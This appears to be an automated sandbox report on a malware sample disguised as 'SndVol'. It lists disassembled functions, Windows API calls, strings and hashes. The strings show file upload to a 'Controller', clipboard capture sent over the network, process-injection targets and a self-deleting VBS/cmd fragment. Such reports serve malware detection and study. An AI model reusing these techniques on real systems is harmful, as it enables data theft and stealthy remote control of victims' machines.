Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE

Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
RegCloseKey.ADVAPI32(?), ref: 0041C9BF

Strings

InstallDate, xrefs: 0041C790
DisplayVersion, xrefs: 0041C768
DisplayName, xrefs: 0041C73C
UninstallString, xrefs: 0041C7A4
InstallLocation, xrefs: 0041C77C
Publisher, xrefs: 0041C751
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041C6A7

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A

Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
GetCursorPos.USER32(?), ref: 0041D5E9
SetForegroundWindow.USER32(?), ref: 0041D5F2
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
ExitProcess.KERNEL32 ref: 0041D665
CreatePopupMenu.USER32 ref: 0041D66B
AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680

Strings

Close, xrefs: 0041D671

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D

Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445DC6
_free.LIBCMT ref: 00445DDC
_free.LIBCMT ref: 00445DED
_free.LIBCMT ref: 00445DFE
_free.LIBCMT ref: 00445E15
GetCPInfo.KERNEL32(?,?), ref: 00445E5D

Part of subcall function 00452E74: _free.LIBCMT ref: 00452EDF

_free.LIBCMT ref: 00446009
_free.LIBCMT ref: 0044601C
_free.LIBCMT ref: 0044602A
_free.LIBCMT ref: 00446035
_free.LIBCMT ref: 00446077
_free.LIBCMT ref: 0044607F
_free.LIBCMT ref: 00446087
_free.LIBCMT ref: 0044608F
_free.LIBCMT ref: 0044609D

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
Opcode Fuzzy Hash: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65

Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0045130A

Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
Part of subcall function 00450502: _free.LIBCMT ref: 00450531
Part of subcall function 00450502: _free.LIBCMT ref: 00450543
Part of subcall function 00450502: _free.LIBCMT ref: 00450555
Part of subcall function 00450502: _free.LIBCMT ref: 00450567
Part of subcall function 00450502: _free.LIBCMT ref: 00450579
Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
Part of subcall function 00450502: _free.LIBCMT ref: 004505F7

_free.LIBCMT ref: 004512FF

Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00451321
_free.LIBCMT ref: 00451336
_free.LIBCMT ref: 00451341
_free.LIBCMT ref: 00451363
_free.LIBCMT ref: 00451376
_free.LIBCMT ref: 00451384
_free.LIBCMT ref: 0045138F
_free.LIBCMT ref: 004513C7
_free.LIBCMT ref: 004513CE
_free.LIBCMT ref: 004513EB
_free.LIBCMT ref: 00451403

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59

Function 00408B7A Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 328fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
__aulldiv.LIBCMT ref: 00408D4D

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
CloseHandle.KERNEL32(00000000), ref: 00408F64
CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
CloseHandle.KERNEL32(00000000), ref: 00408FFC

Strings

SetFilePointerEx error, xrefs: 00408FD4
ReadFile error, xrefs: 00408FC8
Uploading file to Controller: , xrefs: 00408DD5

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
API String ID: 3086580692-2596673759
Opcode ID: 83544a841d733fb685d9403c845306c33a91344e28fc051850798e968e587a75
Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
Opcode Fuzzy Hash: 83544a841d733fb685d9403c845306c33a91344e28fc051850798e968e587a75
Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B

Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450648
_free.LIBCMT ref: 0045066C
_free.LIBCMT ref: 00450679
_free.LIBCMT ref: 0045069E
_free.LIBCMT ref: 004506AB
_free.LIBCMT ref: 004506B4
_free.LIBCMT ref: 00450992
_free.LIBCMT ref: 0045099A

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798

Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6

GetLastError.KERNEL32 ref: 00455CEF
__dosmaperr.LIBCMT ref: 00455CF6
GetFileType.KERNEL32(00000000), ref: 00455D02
GetLastError.KERNEL32 ref: 00455D0C
__dosmaperr.LIBCMT ref: 00455D15
CloseHandle.KERNEL32(00000000), ref: 00455D35
CloseHandle.KERNEL32(?), ref: 00455E7F
GetLastError.KERNEL32 ref: 00455EB1
__dosmaperr.LIBCMT ref: 00455EB8

Strings

H, xrefs: 00455E3D

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59

Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
__alloca_probe_16.LIBCMT ref: 00453EEA
MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
__alloca_probe_16.LIBCMT ref: 00453F94
MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
__freea.LIBCMT ref: 00454003
__freea.LIBCMT ref: 0045400F

Strings

\@E, xrefs: 00453F37, 00453DF1

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID: \@E
API String ID: 201697637-1814623452
Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768

Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E

Strings

Inj, xrefs: 0040F769
C:\Program Files(x86)\Internet Explorer\, xrefs: 0040F6BE
ieinstal.exe, xrefs: 0040F6D5
ielowutil.exe, xrefs: 0040F716

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
API String ID: 3756808967-1743721670
Opcode ID: 90faf2f721b21ffb45675a87819334aaa6a04f4aded6564cc26d2d7333f5989a
Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
Opcode Fuzzy Hash: 90faf2f721b21ffb45675a87819334aaa6a04f4aded6564cc26d2d7333f5989a
Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A

Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450A94
_free.LIBCMT ref: 00450AA2
_free.LIBCMT ref: 00450BD0
_free.LIBCMT ref: 00450BDB

Strings

\&G, xrefs: 00450C1C
\&G, xrefs: 00450C24
`&G, xrefs: 00450C34

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free
String ID: \&G$\&G$`&G
API String ID: 269201875-253610517
Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98

Function 053A16F2 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 053A1761
_free.LIBCMT ref: 053A176F
_free.LIBCMT ref: 053A189D
_free.LIBCMT ref: 053A18A8

Strings

`&G, xrefs: 053A1901
\&G, xrefs: 053A18F1
\&G, xrefs: 053A18E9

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: _free
String ID: \&G$\&G$`&G
API String ID: 269201875-253610517
Opcode ID: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
Instruction ID: 4b878a3e8ef23272bf5689ace776797b76f95236748e951a07d057736f31deb0
Opcode Fuzzy Hash: 3d3472b72281963140e8887de038e5b99b85b4a8b881428f5fb0b5852324da1c
Instruction Fuzzy Hash: DE61D3B2E04205AFDF21DF68C841BAEBBFAFF45720F144169E954EB291E7709941CB90

Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

65535, xrefs: 00414BB3
udp, xrefs: 00414C60, 00414C68, 00414C6C

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E

Function 0040D7FF Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873

Part of subcall function 004136F8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
Part of subcall function 004136F8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
Part of subcall function 004136F8: RegCloseKey.KERNEL32(00000000), ref: 00413738

GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
ExitProcess.KERNEL32 ref: 0040D9C4

Strings

open, xrefs: 0040D9B2
.vbs, xrefs: 0040D85F
Temp, xrefs: 0040D89A
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040D8F9
CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName), xrefs: 0040D967
exepath, xrefs: 0040D831
""", 0, xrefs: 0040D8E1

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
API String ID: 1913171305-2411266221
Opcode ID: 7c0be83f1035b6f98a22b21250c75de82ef56e94692df2942c9a087d203d9b6d
Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
Opcode Fuzzy Hash: 7c0be83f1035b6f98a22b21250c75de82ef56e94692df2942c9a087d203d9b6d
Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98

Function 0536760D Relevance: 17.5, APIs: 8, Strings: 2, Instructions: 46clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0536760E
EmptyClipboard.USER32 ref: 0536761C
CloseClipboard.USER32 ref: 05367622
OpenClipboard.USER32 ref: 05367629
GetClipboardData.USER32(0000000D), ref: 05367639
GlobalFix.KERNEL32(00000000), ref: 05367642
GlobalUnWire.KERNEL32(00000000), ref: 0536764B
CloseClipboard.USER32 ref: 05367651

Part of subcall function 0535576E: send.WS2_32(?,00000000,00000000,00000000), ref: 05355803

Strings

hdF, xrefs: 05367659
!D@, xrefs: 05367D56

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyWiresend
String ID: !D@$hdF
API String ID: 653963949-3475379602
Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
Instruction ID: cfa40c64c1ece5bd8b5110bdb39781cd44da34eebfcc1327bf885c46611a849d
Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
Instruction Fuzzy Hash: 53014831304300DFD724AB71EC5CAAE77A9AF98652F40987DBC07C21A2EF258C05CA69

Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
__dosmaperr.LIBCMT ref: 0043A8A6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
__dosmaperr.LIBCMT ref: 0043A8E3
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
__dosmaperr.LIBCMT ref: 0043A937
_free.LIBCMT ref: 0043A943
_free.LIBCMT ref: 0043A94A

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A

Function 0538B507 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,05352A22,?,00000050,00465E00,00000000), ref: 0538B55F
GetLastError.KERNEL32(?,?,05352A22,?,00000050,00465E00,00000000), ref: 0538B56C
__dosmaperr.LIBCMT ref: 0538B573
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,05352A22,?,00000050,00465E00,00000000), ref: 0538B59F
GetLastError.KERNEL32(?,?,?,05352A22,?,00000050,00465E00,00000000), ref: 0538B5A9
__dosmaperr.LIBCMT ref: 0538B5B0
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,00465E00,00000000,00000000,?,?,?,?,?,?,05352A22,?), ref: 0538B5F3
GetLastError.KERNEL32(?,?,?,?,?,?,05352A22,?,00000050,00465E00,00000000), ref: 0538B5FD
__dosmaperr.LIBCMT ref: 0538B604
_free.LIBCMT ref: 0538B610
_free.LIBCMT ref: 0538B617

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 349d6e8f71b3306115ff94c1c71847e27514464045ba0744507fb65a98dea562
Instruction ID: 7cbca1532b85c064a161919fade8417ce5ac87ec17904b416a4eecda6181bcc2
Opcode Fuzzy Hash: 349d6e8f71b3306115ff94c1c71847e27514464045ba0744507fb65a98dea562
Instruction Fuzzy Hash: AB316DB290430BFBDF19AFA5CC589BFBB69EF05220B140269F950A61A0DB31C951DB60

Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 004054BF
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
TranslateMessage.USER32(?), ref: 0040557E
DispatchMessageA.USER32(?), ref: 00405589
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Strings

GetMessage, xrefs: 004055F8
CloseChat, xrefs: 00405609
DisplayMessage, xrefs: 004055EC

Memory Dump Source

